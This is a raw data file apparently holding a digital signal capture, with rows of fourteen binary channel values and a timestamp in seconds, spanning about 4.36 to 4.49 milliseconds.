1,0,0,0,1,0,0,0,0,0,0,0,1,0,4.3562080e-03 1,0,0,0,1,0,0,0,0,0,0,0,0,0,4.3562280e-03 1,0,0,0,1,0,0,0,0,0,0,0,1,0,4.3562520e-03 1,0,0,0,1,0,0,0,0,0,0,0,0,0,4.3562760e-03 1,0,0,0,1,0,0,0,0,0,0,0,1,0,4.3563000e-03 1,0,0,0,1,0,0,0,0,0,0,0,0,0,4.3563200e-03 1,0,0,0,1,0,0,0,0,0,0,0,1,0,4.3563400e-03 1,0,0,0,1,0,0,0,0,0,0,0,0,0,4.3563640e-03 1,0,0,0,1,0,0,0,0,0,0,0,1,0,4.3563880e-03 1,0,0,0,1,0,0,0,0,0,0,0,0,0,4.3564120e-03 1,0,0,0,1,0,0,0,0,0,0,0,1,0,4.3564360e-03 1,0,0,0,1,0,0,0,0,0,0,0,0,0,4.3564600e-03 1,0,0,0,1,0,0,0,0,0,0,0,1,0,4.3564840e-03 1,0,0,0,1,0,0,0,0,0,0,0,0,0,4.3565120e-03 1,0,0,0,1,0,0,0,0,0,0,0,1,0,4.3565400e-03 1,0,0,0,1,0,0,0,0,0,0,0,0,0,4.3565640e-03 1,0,0,0,1,0,0,0,0,0,0,0,1,0,4.3565880e-03 1,0,0,0,1,0,0,0,0,0,0,0,0,0,4.3566160e-03 1,0,0,0,1,0,0,0,0,0,0,0,1,0,4.3566720e-03 1,0,0,0,1,0,0,0,0,0,0,0,0,0,4.3566920e-03 1,0,0,0,1,1,0,0,0,1,0,0,0,0,4.3567000e-03 1,0,0,0,1,1,0,0,0,1,0,0,1,0,4.3567400e-03 1,0,0,0,1,0,0,0,0,0,0,0,1,0,4.3567720e-03 1,0,0,0,1,0,0,0,0,0,0,0,0,0,4.3567880e-03 1,0,0,0,1,0,0,0,0,0,0,0,1,0,4.3568120e-03 1,0,0,0,1,0,0,0,0,0,0,0,0,0,4.3568320e-03 1,0,0,0,1,0,0,0,0,0,0,0,1,0,4.3568520e-03 1,0,0,0,1,0,0,0,0,0,0,0,0,0,4.3568760e-03 1,0,0,0,1,0,0,0,0,0,0,0,1,0,4.3569000e-03 1,0,0,0,1,0,0,0,0,0,0,0,0,0,4.3569240e-03 1,0,0,0,1,0,0,0,0,1,0,0,0,0,4.3569280e-03 1,0,0,0,1,1,0,0,0,1,0,0,0,0,4.3569320e-03 1,0,0,0,1,1,0,0,0,1,0,0,1,0,4.3569440e-03 1,0,0,0,1,1,0,0,0,1,0,0,0,0,4.3569640e-03 1,0,0,0,1,0,0,0,0,0,0,0,0,0,4.3569760e-03 1,0,0,0,1,0,0,0,0,0,0,0,1,0,4.3570120e-03 1,0,0,0,1,0,0,0,0,0,0,0,0,0,4.3570360e-03 1,0,0,0,1,0,0,0,0,0,0,0,1,0,4.3570800e-03 1,0,0,0,1,0,0,0,0,0,0,0,0,0,4.3571000e-03 1,0,0,0,1,0,0,0,0,0,0,0,1,0,4.3571240e-03 1,0,0,0,1,0,0,0,0,0,0,0,0,0,4.3571480e-03 1,0,0,0,1,0,0,0,0,0,0,0,1,0,4.3571720e-03 1,0,0,0,1,0,0,0,0,1,0,0,0,0,4.3571960e-03 1,0,0,0,1,1,0,0,0,1,0,0,0,0,4.3572000e-03 1,0,0,0,1,1,0,0,0,1,0,0,1,0,4.3572600e-03 1,0,0,0,1,1,0,0,0,1,0,0,0,0,4.3572840e-03 1,0,0,0,1,0,0,0,0,0,0,0,0,0,4.3572920e-03 1,0,0,0,1,0,0,0,0,0,0,0,1,0,4.3573080e-03 1,0,0,0,1,0,0,0,0,0,0,0,0,0,4.3573640e-03 1,0,0,0,1,0,0,0,0,0,0,0,1,0,4.3573880e-03 1,0,0,0,1,0,0,0,0,0,0,0,0,0,4.3574120e-03 1,0,0,0,1,0,0,0,0,1,0,0,0,0,4.3574160e-03 1,0,0,0,1,1,0,0,0,1,0,0,0,0,4.3574200e-03 1,0,0,0,1,1,0,0,0,1,0,0,1,0,4.3574520e-03 1,0,0,0,1,1,0,0,0,1,0,0,0,0,4.3574760e-03 1,0,0,0,1,0,0,0,0,0,0,0,0,0,4.3574840e-03 1,0,0,0,1,0,0,0,0,0,0,0,1,0,4.3575400e-03 1,0,0,0,1,0,0,0,0,0,0,0,0,0,4.3575600e-03 1,0,0,0,1,0,0,0,0,0,0,0,1,0,4.3575800e-03 1,0,0,0,1,0,0,0,0,0,0,0,0,0,4.3576040e-03 1,0,0,0,1,0,0,0,0,0,0,0,1,0,4.3576600e-03 1,0,0,0,1,0,0,0,0,0,0,0,0,0,4.3576840e-03 1,0,0,0,1,0,0,0,0,0,0,0,1,0,4.3577080e-03 1,0,0,0,1,0,0,0,0,0,0,0,0,0,4.3577320e-03 1,0,0,0,1,0,0,0,0,0,0,0,1,0,4.3577880e-03 1,0,0,0,1,0,0,0,0,0,0,0,0,0,4.3578120e-03 1,0,0,0,1,0,0,0,0,0,0,0,1,0,4.3578320e-03 1,0,0,0,1,0,0,0,0,0,0,0,0,0,4.3578520e-03 1,0,0,0,1,0,0,0,0,0,0,0,1,0,4.3578760e-03 1,0,0,0,1,0,0,0,0,0,0,0,0,0,4.3579320e-03 1,0,0,0,1,0,0,0,0,0,0,0,1,0,4.3579560e-03 1,0,0,0,1,0,0,0,0,0,0,0,0,0,4.3579800e-03 1,0,0,0,1,0,0,0,0,0,0,0,1,0,4.3580040e-03 1,0,0,0,1,0,0,0,0,0,0,0,0,0,4.3580240e-03 1,0,0,0,1,0,0,0,0,0,0,0,1,0,4.3580480e-03 1,0,0,0,1,0,0,0,0,0,0,0,0,0,4.3580680e-03 1,0,0,0,1,0,0,0,0,0,0,0,1,0,4.3580920e-03 1,0,0,0,1,0,0,0,0,0,0,0,0,0,4.3581480e-03 1,0,0,0,1,0,0,0,0,0,0,0,1,0,4.3581720e-03 1,0,0,0,1,0,0,0,0,0,0,0,0,0,4.3581960e-03 1,0,0,0,1,1,0,0,0,1,0,0,0,0,4.3582040e-03 1,0,0,0,1,1,0,0,0,1,0,0,1,0,4.3582200e-03 1,0,0,0,1,1,0,0,0,1,0,0,0,0,4.3582400e-03 1,0,0,0,1,1,0,0,0,0,0,0,0,0,4.3582480e-03 1,0,0,0,1,0,0,0,0,0,0,0,0,0,4.3582520e-03 1,0,0,0,1,0,0,0,0,0,0,0,1,0,4.3582840e-03 1,0,0,0,1,0,0,0,0,0,0,0,0,0,4.3583400e-03 1,0,0,0,1,0,0,0,0,0,0,0,1,0,4.3583880e-03 1,0,0,0,1,0,0,0,0,0,0,0,0,0,4.3584120e-03 1,0,0,0,1,0,0,0,0,0,0,0,1,0,4.3584680e-03 1,0,0,0,1,0,0,0,0,0,0,0,0,0,4.3584920e-03 1,0,0,0,1,0,0,0,0,0,0,0,1,0,4.3585120e-03 1,0,0,0,1,0,0,0,0,0,0,0,0,0,4.3585320e-03 1,0,0,0,1,1,0,0,0,1,0,0,0,0,4.3585400e-03 1,0,0,0,1,1,0,0,0,1,0,0,1,0,4.3585560e-03 1,0,0,0,1,0,0,0,0,0,0,0,1,0,4.3585880e-03 1,0,0,0,1,0,0,0,0,0,0,0,0,0,4.3586120e-03 1,0,0,0,1,0,0,0,0,0,0,0,1,0,4.3586360e-03 1,0,0,0,1,0,0,0,0,0,0,0,0,0,4.3586600e-03 1,0,0,0,1,1,0,0,0,1,0,0,0,0,4.3586680e-03 1,0,0,0,1,1,0,0,0,1,0,0,1,0,4.3587040e-03 1,0,0,0,1,1,0,0,0,1,0,0,0,0,4.3587280e-03 1,0,0,0,1,0,0,0,0,0,0,0,0,0,4.3587360e-03 1,0,0,0,1,0,0,0,0,0,0,0,1,0,4.3587480e-03 1,0,0,0,1,0,0,0,0,0,0,0,0,0,4.3587720e-03 1,0,0,0,1,0,0,0,0,0,0,0,1,0,4.3588280e-03 1,0,0,0,1,0,0,0,0,0,0,0,0,0,4.3588520e-03 1,0,0,0,1,0,0,0,0,0,0,0,1,0,4.3588760e-03 1,0,0,0,1,0,0,0,0,0,0,0,0,0,4.3588960e-03 1,0,0,0,1,0,0,0,0,0,0,0,1,0,4.3589200e-03 1,0,0,0,1,1,0,0,0,1,0,0,1,0,4.3589480e-03 1,0,0,0,1,1,0,0,0,1,0,0,0,0,4.3589800e-03 1,0,0,0,1,1,0,0,0,1,0,0,1,0,4.3590200e-03 1,0,0,0,1,1,0,0,0,1,0,0,0,0,4.3590440e-03 1,0,0,0,1,0,0,0,0,0,0,0,0,0,4.3590520e-03 1,0,0,0,1,0,0,0,0,0,0,0,1,0,4.3590680e-03 1,0,0,0,1,0,0,0,0,0,0,0,0,0,4.3590920e-03 1,0,0,0,1,0,0,0,0,0,0,0,1,0,4.3591120e-03 1,0,0,0,1,0,0,0,0,0,0,0,0,0,4.3591320e-03 1,0,0,0,1,0,0,0,0,0,0,0,1,0,4.3591560e-03 1,0,0,0,1,0,0,0,0,0,0,0,0,0,4.3591800e-03 1,0,0,0,1,0,0,0,0,0,0,0,1,0,4.3592040e-03 1,0,0,0,1,0,0,0,0,0,0,0,0,0,4.3592240e-03 1,0,0,0,1,0,0,0,0,0,0,0,1,0,4.3592480e-03 1,0,0,0,1,0,0,0,0,0,0,0,0,0,4.3592680e-03 1,0,0,0,1,0,0,0,0,0,0,0,1,0,4.3592920e-03 1,0,0,0,1,0,0,0,0,0,0,0,0,0,4.3593160e-03 1,0,0,0,1,0,0,0,0,0,0,0,1,0,4.3593400e-03 1,0,0,0,1,0,0,0,0,0,0,0,0,0,4.3593640e-03 1,0,0,0,1,0,0,0,0,0,0,0,1,0,4.3593880e-03 1,0,0,0,1,0,0,0,0,0,0,0,0,0,4.3594120e-03 1,0,0,0,1,0,0,0,0,0,0,0,1,0,4.3594360e-03 1,0,0,0,1,0,0,0,0,0,0,0,0,0,4.3594600e-03 1,0,0,0,1,0,0,0,0,0,0,0,1,0,4.3594920e-03 1,0,0,0,1,0,0,0,0,0,0,0,0,0,4.3595160e-03 1,0,0,0,1,0,0,0,0,0,0,0,1,0,4.3595400e-03 1,0,0,0,1,0,0,0,0,0,0,0,0,0,4.3595640e-03 1,0,0,0,1,0,0,0,0,0,0,0,1,0,4.3595960e-03 1,0,0,0,1,0,0,0,0,0,0,0,0,0,4.3596200e-03 1,0,0,0,1,0,0,0,0,0,0,0,1,0,4.3596440e-03 1,0,0,0,1,0,0,0,0,0,0,0,0,0,4.3596680e-03 1,0,0,0,1,0,0,0,0,0,0,0,1,0,4.3596920e-03 1,0,0,0,1,0,0,0,0,0,0,0,0,0,4.3597160e-03 1,0,0,0,1,0,0,0,0,0,0,0,1,0,4.3597400e-03 1,0,0,0,1,0,0,0,0,0,0,0,0,0,4.3597640e-03 1,0,0,0,1,0,0,0,0,0,0,0,1,0,4.3597920e-03 1,0,0,0,1,0,0,0,0,0,0,0,0,0,4.3598640e-03 1,0,0,0,1,0,0,0,0,0,0,0,1,0,4.3598880e-03 1,0,0,0,1,0,0,0,0,0,0,0,0,0,4.3599080e-03 1,0,0,0,1,0,0,0,0,0,0,0,1,0,4.3599320e-03 1,0,0,0,1,0,0,0,0,0,0,0,0,0,4.3599560e-03 1,0,0,0,1,0,0,0,0,0,0,0,1,0,4.3599800e-03 1,0,0,0,1,0,0,0,0,0,0,0,0,0,4.3600360e-03 1,0,0,0,1,0,0,0,0,0,0,0,1,0,4.3600600e-03 1,0,0,0,1,0,0,0,0,0,0,0,0,0,4.3600800e-03 1,0,0,0,1,0,0,0,0,0,0,0,1,0,4.3601000e-03 1,0,0,0,1,0,0,0,0,0,0,0,0,0,4.3601240e-03 1,0,0,0,1,0,0,0,0,0,0,0,1,0,4.3601480e-03 1,0,0,0,1,0,0,0,0,0,0,0,0,0,4.3601720e-03 1,0,0,0,1,0,0,0,0,0,0,0,1,0,4.3601920e-03 1,0,0,0,1,0,0,0,0,0,0,0,0,0,4.3602120e-03 1,0,0,0,1,0,0,0,0,0,0,0,1,0,4.3602360e-03 1,0,0,0,1,0,0,0,0,0,0,0,0,0,4.3602600e-03 1,0,0,0,1,0,0,0,0,0,0,0,1,0,4.3603160e-03 1,0,0,0,1,0,0,0,0,0,0,0,0,0,4.3603400e-03 1,0,0,0,1,0,0,0,0,0,0,0,1,0,4.3603640e-03 1,0,0,0,1,0,0,0,0,0,0,0,0,0,4.3603840e-03 1,0,0,0,1,0,0,0,0,0,0,0,1,0,4.3604080e-03 1,0,0,0,1,0,0,0,0,0,0,0,0,0,4.3604280e-03 1,0,0,0,1,0,0,0,0,0,0,0,1,0,4.3604520e-03 1,0,0,0,1,0,0,0,0,0,0,0,0,0,4.3604760e-03 1,0,0,0,1,0,0,0,0,0,0,0,1,0,4.3605000e-03 1,0,0,0,1,0,0,0,0,0,0,0,0,0,4.3605200e-03 1,0,0,0,1,0,0,0,0,0,0,0,1,0,4.3605400e-03 1,0,0,0,1,0,0,0,0,0,0,0,0,0,4.3605640e-03 1,0,0,0,1,0,0,0,0,0,0,0,1,0,4.3605880e-03 1,0,0,0,1,0,0,0,0,0,0,0,0,0,4.3606120e-03 1,0,0,0,1,1,0,0,0,1,0,0,0,0,4.3606160e-03 1,0,0,0,1,1,0,0,0,1,0,0,0,1,4.4848040e-03 0,0,0,0,1,1,0,0,0,1,0,0,0,1,4.4849800e-03 0,1,0,0,1,1,0,0,0,1,0,0,0,1,4.4850520e-03 0,1,0,0,1,1,0,0,0,1,0,1,0,1,4.4850680e-03 0,1,0,0,1,1,0,0,0,1,0,0,0,1,4.4850920e-03 0,1,0,0,1,1,0,0,0,1,0,0,1,1,4.4854760e-03 0,1,0,0,1,1,0,0,0,1,0,0,0,1,4.4855000e-03 0,1,0,0,1,0,0,0,0,0,0,0,0,1,4.4855080e-03 0,1,0,0,1,0,0,0,0,0,0,0,1,1,4.4855720e-03 0,1,0,0,1,0,0,0,0,0,0,0,0,1,4.4855960e-03 0,1,0,0,1,0,0,0,0,0,0,0,1,1,4.4856160e-03 0,1,0,0,1,0,0,0,0,0,0,0,0,1,4.4856400e-03 0,1,0,0,1,0,0,0,0,0,0,0,1,1,4.4856600e-03 0,1,0,0,1,0,0,0,0,0,0,0,0,1,4.4856840e-03 0,1,0,0,1,0,0,0,0,0,0,0,0,0,4.4857000e-03 0,1,0,0,1,0,0,0,0,0,0,0,1,0,4.4857400e-03 0,1,0,0,1,0,0,0,0,0,0,0,0,0,4.4857640e-03 0,1,0,0,1,0,0,0,0,0,0,0,1,0,4.4857880e-03 0,1,0,0,1,0,0,0,0,0,0,0,0,0,4.4858440e-03 0,1,0,0,1,0,0,0,0,0,0,0,1,0,4.4858680e-03 0,1,0,0,1,0,0,0,0,0,0,0,0,0,4.4858920e-03 0,1,0,0,1,0,0,0,0,0,0,0,1,0,4.4859120e-03 0,1,0,0,1,0,0,0,0,0,0,0,0,0,4.4859320e-03 0,1,0,0,1,0,0,0,0,0,0,0,1,0,4.4859560e-03 0,1,0,0,1,0,0,0,0,0,0,0,0,0,4.4860120e-03 0,1,0,0,1,0,0,0,0,0,0,0,1,0,4.4860360e-03 0,1,0,0,1,0,0,0,0,0,0,0,0,0,4.4860600e-03 0,1,0,0,1,1,0,0,0,1,0,0,0,0,4.4860680e-03 0,1,0,0,1,1,0,0,0,1,0,0,1,0,4.4861040e-03 0,1,0,0,1,1,0,0,0,1,0,0,0,0,4.4861280e-03 0,1,0,0,1,1,0,0,0,0,0,0,0,0,4.4861360e-03 0,1,0,0,1,0,0,0,0,0,0,0,0,0,4.4861400e-03 0,1,0,0,1,0,0,0,0,0,0,0,1,0,4.4861480e-03 0,1,0,0,1,0,0,0,0,0,0,0,0,0,4.4861720e-03 0,1,0,0,1,0,0,0,0,0,0,0,1,0,4.4862280e-03 0,1,0,0,1,0,0,0,0,0,0,0,0,0,4.4862520e-03 0,1,0,0,1,0,0,0,0,0,0,0,1,0,4.4862760e-03 0,1,0,0,1,0,0,0,0,0,0,0,0,0,4.4863000e-03 0,1,0,0,1,1,0,0,0,1,0,0,0,0,4.4863040e-03 0,1,0,0,1,1,0,0,0,1,0,0,1,0,4.4863800e-03 0,1,0,0,1,1,0,0,0,1,0,0,0,0,4.4864000e-03 0,1,0,0,1,1,0,0,0,0,0,0,0,0,4.4864080e-03 0,1,0,0,1,0,0,0,0,0,0,0,0,0,4.4864120e-03 0,1,0,0,1,0,0,0,0,0,0,0,1,0,4.4864200e-03 0,1,0,0,1,0,0,0,0,0,0,0,0,0,4.4864440e-03 0,1,0,0,1,0,0,0,0,0,0,0,1,0,4.4864680e-03 0,1,0,0,1,0,0,0,0,0,0,0,0,0,4.4864920e-03 0,1,0,0,1,0,0,0,0,0,0,0,1,0,4.4865120e-03 0,1,0,0,1,0,0,0,0,0,0,0,0,0,4.4865720e-03 0,1,0,0,1,0,0,0,0,0,0,0,1,0,4.4865920e-03 0,1,0,0,1,0,0,0,0,0,0,0,0,0,4.4866120e-03 0,1,0,0,1,0,0,0,0,0,0,0,1,0,4.4866360e-03 0,1,0,0,1,0,0,0,0,0,0,0,0,0,4.4866600e-03 0,1,0,0,1,0,0,0,0,0,0,0,1,0,4.4866840e-03 0,1,0,0,1,0,0,0,0,0,0,0,0,0,4.4867040e-03 0,1,0,0,1,1,0,0,0,1,0,0,0,0,4.4867120e-03 0,1,0,0,1,1,0,0,0,1,0,0,1,0,4.4867480e-03 0,1,0,0,1,1,0,0,0,1,0,0,0,0,4.4867720e-03 0,1,0,0,1,0,0,0,0,0,0,0,0,0,4.4867800e-03 0,1,0,0,1,0,0,0,0,0,0,0,1,0,4.4867960e-03 0,1,0,0,1,0,0,0,0,0,0,0,0,0,4.4868200e-03 0,1,0,0,1,0,0,0,0,0,0,0,1,0,4.4868400e-03 0,1,0,0,1,0,0,0,0,0,0,0,0,0,4.4868600e-03 0,1,0,0,1,0,0,0,0,0,0,0,1,0,4.4868840e-03 0,1,0,0,1,0,0,0,0,0,0,0,0,0,4.4869080e-03 0,1,0,0,1,0,0,0,0,0,0,0,1,0,4.4869320e-03 0,1,0,0,1,0,0,0,0,0,0,0,0,0,4.4869520e-03 0,1,0,0,1,1,0,0,0,1,0,0,0,0,4.4869600e-03 0,1,0,0,1,1,0,0,0,1,0,0,1,0,4.4870440e-03 0,1,0,0,1,1,0,0,0,1,0,0,0,0,4.4870680e-03 0,1,0,0,1,0,0,0,0,0,0,0,0,0,4.4870760e-03 0,1,0,0,1,0,0,0,0,0,0,0,1,0,4.4870920e-03 0,1,0,0,1,0,0,0,0,0,0,0,0,0,4.4871480e-03 0,1,0,0,1,0,0,0,0,0,0,0,1,0,4.4871720e-03 0,1,0,0,1,0,0,0,0,0,0,0,0,0,4.4871920e-03 0,1,0,0,1,1,0,0,0,1,0,0,0,0,4.4872000e-03 0,1,0,0,1,1,0,0,0,1,0,0,1,0,4.4872360e-03 0,1,0,0,1,0,0,0,0,0,0,0,1,0,4.4872680e-03 0,1,0,0,1,0,0,0,0,0,0,0,0,0,4.4872920e-03 0,1,0,0,1,0,0,0,0,0,0,0,1,0,4.4873160e-03 0,1,0,0,1,0,0,0,0,0,0,0,0,0,4.4873400e-03 0,1,0,0,1,0,0,0,0,0,0,0,1,0,4.4873640e-03 0,1,0,0,1,0,0,0,0,0,0,0,0,0,4.4874200e-03 0,1,0,0,1,0,0,0,0,0,0,0,1,0,4.4874440e-03 0,1,0,0,1,0,0,0,0,0,0,0,0,0,4.4874640e-03 0,1,0,0,1,0,0,0,0,0,0,0,1,0,4.4874880e-03 0,1,0,0,1,0,0,0,0,0,0,0,0,0,4.4875080e-03 0,1,0,0,1,0,0,0,0,0,0,0,1,0,4.4875320e-03 0,1,0,0,1,0,0,0,0,0,0,0,0,0,4.4875560e-03 0,1,0,0,1,0,0,0,0,0,0,0,1,0,4.4875800e-03 0,1,0,0,1,0,0,0,0,0,0,0,0,0,4.4876000e-03 0,1,0,0,1,0,0,0,0,0,0,0,1,0,4.4876200e-03 0,1,0,0,1,0,0,0,0,0,0,0,0,0,4.4876440e-03 0,1,0,0,1,0,0,0,0,0,0,0,1,0,4.4877000e-03 0,1,0,0,1,0,0,0,0,0,0,0,0,0,4.4877240e-03 0,1,0,0,1,0,0,0,0,0,0,0,1,0,4.4877480e-03 0,1,0,0,1,0,0,0,0,0,0,0,0,0,4.4877720e-03 0,1,0,0,1,0,0,0,0,0,0,0,1,0,4.4877920e-03 0,1,0,0,1,0,0,0,0,0,0,0,0,0,4.4878120e-03 0,1,0,0,1,1,0,0,0,1,0,0,0,0,4.4878200e-03 0,1,0,0,1,1,0,0,0,1,0,0,1,0,4.4878600e-03 0,1,0,0,1,1,0,0,0,1,0,0,0,0,4.4878840e-03 0,1,0,0,1,0,0,0,0,0,0,0,0,0,4.4878920e-03 0,1,0,0,1,0,0,0,0,0,0,0,1,0,4.4879080e-03 0,1,0,0,1,0,0,0,0,0,0,0,0,0,4.4879280e-03 0,1,0,0,1,1,0,0,0,1,0,0,0,0,4.4879320e-03 0,1,0,0,1,1,0,0,0,1,0,0,1,0,4.4879720e-03 0,1,0,0,1,1,0,0,0,1,0,0,0,0,4.4879960e-03 0,1,0,0,1,0,0,0,0,0,0,0,0,0,4.4880040e-03 0,1,0,0,1,0,0,0,0,0,0,0,1,0,4.4880200e-03 0,1,0,0,1,0,0,0,0,0,0,0,0,0,4.4880400e-03 0,1,0,0,1,0,0,0,0,0,0,0,1,0,4.4880600e-03 0,1,0,0,1,0,0,0,0,0,0,0,0,0,4.4881280e-03 0,1,0,0,1,0,0,0,0,0,0,0,1,0,4.4881480e-03 0,1,0,0,1,0,0,0,0,0,0,0,0,0,4.4881720e-03 0,1,0,0,1,0,0,0,0,0,0,0,1,0,4.4881960e-03 0,1,0,0,1,0,0,0,0,0,0,0,0,0,4.4882200e-03 0,1,0,0,1,0,0,0,0,1,0,0,0,0,4.4882240e-03 0,1,0,0,1,1,0,0,0,1,0,0,0,0,4.4882280e-03 0,1,0,0,1,1,0,0,0,1,0,0,1,0,4.4882600e-03 0,1,0,0,1,1,0,0,0,1,0,0,0,0,4.4882840e-03 0,1,0,0,1,0,0,0,0,0,0,0,0,0,4.4882920e-03 0,1,0,0,1,0,0,0,0,0,0,0,1,0,4.4883080e-03 0,1,0,0,1,0,0,0,0,0,0,0,0,0,4.4883640e-03 0,1,0,0,1,0,0,0,0,0,0,0,1,0,4.4883880e-03 0,1,0,0,1,0,0,0,0,0,0,0,0,0,4.4884120e-03 0,1,0,0,1,0,0,0,0,0,0,0,1,0,4.4884320e-03 0,1,0,0,1,0,0,0,0,0,0,0,0,0,4.4884520e-03 0,1,0,0,1,0,0,0,0,0,0,0,1,0,4.4884760e-03 0,1,0,0,1,0,0,0,0,0,0,0,0,0,4.4885000e-03 0,1,0,0,1,0,0,0,0,0,0,0,1,0,4.4885240e-03 0,1,0,0,1,0,0,0,0,0,0,0,0,0,4.4885440e-03 0,1,0,0,1,0,0,0,0,0,0,0,1,0,4.4885680e-03 0,1,0,0,1,0,0,0,0,0,0,0,0,0,4.4886240e-03 0,1,0,0,1,0,0,0,0,0,0,0,1,0,4.4886480e-03 0,1,0,0,1,0,0,0,0,0,0,0,0,0,4.4886680e-03 0,1,0,0,1,0,0,0,0,0,0,0,1,0,4.4886920e-03 0,1,0,0,1,0,0,0,0,0,0,0,0,0,4.4887160e-03 0,1,0,0,1,0,0,0,0,0,0,0,1,0,4.4887400e-03 0,1,0,0,1,0,0,0,0,0,0,0,0,0,4.4887600e-03 0,1,0,0,1,0,0,0,0,0,0,0,1,0,4.4887800e-03 0,1,0,0,1,0,0,0,0,0,0,0,0,0,4.4888040e-03 0,1,0,0,1,0,0,0,0,0,0,0,1,0,4.4888280e-03 0,1,0,0,1,0,0,0,0,0,0,0,0,0,4.4888520e-03 0,1,0,0,1,0,0,0,0,1,0,0,0,0,4.4888560e-03 0,1,0,0,1,1,0,0,0,1,0,0,0,0,4.4888600e-03 0,1,0,0,1,1,0,0,0,1,0,0,1,0,4.4888920e-03 0,1,0,0,1,1,0,0,0,1,0,0,0,0,4.4889160e-03 0,1,0,0,1,1,0,0,0,0,0,0,0,0,4.4889240e-03 0,1,0,0,1,0,0,0,0,0,0,0,0,0,4.4889280e-03 0,1,0,0,1,0,0,0,0,0,0,0,1,0,4.4889400e-03 0,1,0,0,1,0,0,0,0,0,0,0,0,0,4.4889640e-03 0,1,0,0,1,0,0,0,0,0,0,0,1,0,4.4889840e-03 0,1,0,0,1,0,0,0,0,0,0,0,0,0,4.4890080e-03 0,1,0,0,1,0,0,0,0,0,0,0,1,0,4.4890280e-03 0,1,0,0,1,0,0,0,0,0,0,0,0,0,4.4890520e-03 0,1,0,0,1,0,0,0,0,0,0,0,1,0,4.4890760e-03 0,1,0,0,1,0,0,0,0,0,0,0,0,0,4.4891000e-03 0,1,0,0,1,1,0,0,0,1,0,0,0,0,4.4891040e-03 0,1,0,0,1,1,0,0,0,1,0,0,1,0,4.4891240e-03 0,1,0,0,1,1,0,0,0,1,0,0,0,0,4.4891520e-03 0,1,0,0,1,1,0,0,0,1,0,0,1,0,4.4891760e-03 0,1,0,0,1,1,0,0,0,1,0,0,0,0,4.4892040e-03 0,1,0,0,1,1,0,0,0,0,0,0,0,0,4.4892080e-03 0,1,0,0,1,0,0,0,0,0,0,0,0,0,4.4892120e-03 0,1,0,0,1,0,0,0,0,0,0,0,1,0,4.4892560e-03 0,1,0,0,1,0,0,0,0,0,0,0,0,0,4.4892800e-03 0,1,0,0,1,0,0,0,0,0,0,0,1,0,4.4893320e-03 0,1,0,0,1,0,0,0,0,0,0,0,0,0,4.4893560e-03 0,1,0,0,1,0,0,0,0,0,0,0,1,0,4.4893800e-03 0,1,0,0,1,0,0,0,0,0,0,0,0,0,4.4894400e-03 0,1,0,0,1,0,0,0,0,0,0,0,1,0,4.4894600e-03 0,1,0,0,1,0,0,0,0,0,0,0,0,0,4.4894840e-03 0,1,0,0,1,0,0,0,0,0,0,0,1,0,4.4895080e-03 0,1,0,0,1,0,0,0,0,0,0,0,0,0,4.4895320e-03 0,1,0,0,1,0,0,0,0,1,0,0,0,0,4.4895360e-03 0,1,0,0,1,1,0,0,0,1,0,0,0,0,4.4895400e-03 0,1,0,0,1,1,0,0,0,1,0,0,1,0,4.4895720e-03 0,1,0,0,1,1,0,0,0,1,0,0,0,0,4.4895960e-03 0,1,0,0,1,1,0,0,0,0,0,0,0,0,4.4896040e-03 0,1,0,0,1,0,0,0,0,0,0,0,0,0,4.4896080e-03 0,1,0,0,1,0,0,0,0,0,0,0,1,0,4.4896200e-03 0,1,0,0,1,0,0,0,0,0,0,0,0,0,4.4896440e-03 0,1,0,0,1,0,0,0,0,0,0,0,1,0,4.4896640e-03 0,1,0,0,1,0,0,0,0,0,0,0,0,0,4.4896880e-03 0,1,0,0,1,0,0,0,0,0,0,0,1,0,4.4897080e-03 0,1,0,0,1,0,0,0,0,0,0,0,0,0,4.4897320e-03 0,1,0,0,1,0,0,0,0,0,0,0,1,0,4.4897560e-03 0,1,0,0,1,0,0,0,0,0,0,0,0,0,4.4897800e-03 0,1,0,0,1,0,0,0,0,0,0,0,1,0,4.4898040e-03 0,1,0,0,1,0,0,0,0,0,0,0,0,0,4.4898320e-03 0,1,0,0,1,0,0,0,0,0,0,0,1,0,4.4898560e-03 0,1,0,0,1,0,0,0,0,0,0,0,0,0,4.4898840e-03 0,1,0,0,1,0,0,0,0,0,0,0,1,0,4.4899080e-03 0,1,0,0,1,0,0,0,0,0,0,0,0,0,4.4899320e-03 0,1,0,0,1,0,0,0,0,0,0,0,1,0,4.4899600e-03 0,1,0,0,1,0,0,0,0,0,0,0,0,0,4.4899840e-03 0,1,0,0,1,0,0,0,0,0,0,0,1,0,4.4900120e-03 0,1,0,0,1,0,0,0,0,0,0,0,0,0,4.4900360e-03 0,1,0,0,1,0,0,0,0,0,0,0,1,0,4.4900600e-03 0,1,0,0,1,0,0,0,0,0,0,0,0,0,4.4900840e-03 0,1,0,0,1,0,0,0,0,0,0,0,1,0,4.4901080e-03 0,1,0,0,1,0,0,0,0,0,0,0,0,0,4.4901320e-03 0,1,0,0,1,0,0,0,0,0,0,0,1,0,4.4901600e-03 0,1,0,0,1,0,0,0,0,0,0,0,0,0,4.4901840e-03 0,1,0,0,1,0,0,0,0,0,0,0,1,0,4.4902120e-03 0,1,0,0,1,0,0,0,0,1,0,0,0,0,4.4902360e-03 0,1,0,0,1,1,0,0,0,1,0,0,0,0,4.4902400e-03 0,1,0,0,1,1,0,0,0,1,0,0,1,0,4.4902600e-03 0,1,0,0,1,1,0,0,0,1,0,0,0,0,4.4902840e-03 0,1,0,0,1,1,0,0,0,1,0,0,1,0,4.4903080e-03 0,1,0,0,1,1,0,0,0,1,0,0,0,0,4.4903320e-03 0,1,0,0,1,0,0,0,0,0,0,0,0,0,4.4903400e-03 0,1,0,0,1,0,0,0,0,0,0,0,1,0,4.4903880e-03 0,1,0,0,1,0,0,0,0,0,0,0,0,0,4.4904120e-03 0,1,0,0,1,0,0,0,0,0,0,0,1,0,4.4904600e-03 0,1,0,0,1,0,0,0,0,0,0,0,0,0,4.4904840e-03 0,1,0,0,1,0,0,0,0,0,0,0,1,0,4.4905080e-03 0,1,0,0,1,0,0,0,0,0,0,0,0,0,4.4905320e-03 0,1,0,0,1,0,0,0,0,0,0,0,1,0,4.4905600e-03 0,1,0,0,1,0,0,0,0,0,0,0,0,0,4.4905840e-03 0,1,0,0,1,1,0,0,0,1,0,0,0,0,4.4905880e-03 0,1,0,0,1,1,0,0,0,1,0,0,1,0,4.4906360e-03 0,1,0,0,1,1,0,0,0,1,0,0,0,0,4.4906600e-03 0,1,0,0,1,0,0,0,0,0,0,0,0,0,4.4906680e-03 0,1,0,0,1,0,0,0,0,0,0,0,1,0,4.4906840e-03 0,1,0,0,1,0,0,0,0,0,0,0,0,0,4.4907080e-03 